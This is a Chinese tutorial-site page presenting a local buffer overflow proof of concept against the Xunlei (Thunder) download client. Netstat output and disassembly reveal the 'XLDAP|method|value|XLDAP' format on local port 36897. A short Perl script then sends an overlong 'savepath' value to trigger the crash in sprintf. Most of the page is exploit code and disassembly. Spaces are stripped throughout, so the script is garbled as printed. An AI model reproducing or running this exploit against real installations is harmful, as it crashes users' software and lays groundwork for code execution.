手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >最新迅雷本地溢出POC
最新迅雷本地溢出POC
摘要:C:>netstat-na|find"36897"TCP127.0.0.1:368970.0.0.0:0LISTENING绑定的本地IP啊?...

C:>netstat-na|find"36897"

TCP127.0.0.1:368970.0.0.0:0LISTENING

绑定的本地IP啊?!那就说明这个是不可以远程的,只能本地了。

......

23132CBE68B4C61323push2313C6B4;ASCII"savepath"

23132CC357pushedi

23132CC4FFD6callesi

23132CC659popecx

23132CC784C0testal,al

......

23132CEF85FFtestedi,edi

23132CF17402jeshort23132CF5

23132CF38BCFmovecx,edi

23132CF5B8D4C61323moveax,2313C6D4;ASCII"XLDAP"

23132CFA50pusheax

23132CFB52pushedx

23132CFC51pushecx

23132CFD50pusheax

23132CFE8D855CFEFFFFleaeax,dwordptr[ebp-1A4]

23132D0468C0C61323push2313C6C0;ASCII"%s|%s|%s|%s"

......

根据上面可以分析出来这个端口接受数据的格式是XLDAP|A|B|XLDAP,A是方法,B是值。又偷懒看了下介绍,问题出在savepath方法上,那么构造数据就很简单了,POC如下:

#!/usr/bin/perl

useIO::Socket;

if($socket=IO::Socket::INET->new(PeerAddr=>"127.0.0.1",PeerPort=>"36897",Proto=>"TCP"))

{

$exploit="XLDAP|savepath|".

#("A"x397).

("A"x500).

"|XLDAP";

print$socket$exploit;

sleep(1);

close($socket);

}

else

{

print"Cannotconnecttolocalhost:36897portn";

}

如果用python写exp的话你会很郁闷,因为py总是会给偶多出一个换行,就算使用[:-1]这种方法也没用,郁闷,目前不清楚是传递的过程还是print的时候,谁知道是什么原因?

23132D0950pusheax

23132D0AFF1554E51323calldwordptr[<&MSVCRT.sprintf>];crash

23132D108D855CFEFFFFleaeax,dwordptr[ebp-1A4]

就是在执行这步sprintf函数复制的时候导致crash。

【最新迅雷本地溢出POC】相关文章:

某省高考志愿填报系统的漏洞实战解说

关于对河南网通封锁局域网共享上网的破解

文件上传漏洞在惠信中的应用

对Serv-U 6.0.0.2默认帐户及密码的一点理解

我是如何发现CCProxy远程溢出漏洞的

搜索型注入之我看---注入不分家

利用DWRCC突破天网防火墙(经验)(图)

最近比较流行的数据库挂马

河南移动网络客服系统验证码的缺陷分析和利用!

轻松获得oblog 2.52的WebShell

精品推荐
分类导航